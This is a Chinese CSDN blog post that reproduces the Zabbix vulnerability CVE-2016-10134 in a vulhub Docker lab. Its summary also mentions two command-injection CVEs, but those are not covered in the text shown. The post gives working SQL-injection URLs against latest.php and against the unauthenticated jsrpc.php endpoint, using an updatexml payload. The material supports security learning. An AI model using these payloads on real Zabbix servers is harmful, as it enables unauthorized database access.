vulhub漏洞复现77_zabbix

本文详细介绍了Zabbix的三个安全漏洞:CVE-2016-10134的PHP SQL注入,CVE-2017-2824的命令注入,以及CVE-2020-11800的IPv6命令注入。通过复现这些漏洞,展示了攻击者如何利用这些漏洞执行任意SQL查询和命令,以及如何配置和检测这些漏洞。文章还提供了环境搭建方法和POC代码。
摘要由CSDN通过智能技术生成

一、 CVE-2016-10134_ zabbix latest.php SQL注入漏洞

漏洞详情

zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。

运行环境

靶场:192.168.4.10_ubuntu

执行如下命令启动zabbix 3.0.3:

#docker-compose up -d

执行命令后,将启动数据库(mysql)、zabbix server、zabbix agent、zabbix web。如果内存稍小,可能会存在某个容器挂掉的情况,我们可以通过`docker-compose ps`查看容器状态,并通过`docker-compose start`来重新启动容器。

复现漏洞

访问`http://your-ip:8080`,用账号`guest`(密码为空)登录游客账户。

登录后,查看Cookie中的`zbx_sessionid`,复制后16位字符:

将这16个字符作为sid的值,访问`http://your-ip:8080/latest.php?output=ajax&sid=849cafc30fd8348b&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)`,可见成功注入:

 

这个漏洞也可以通过jsrpc.php触发,且无需登录:`http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)`:

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值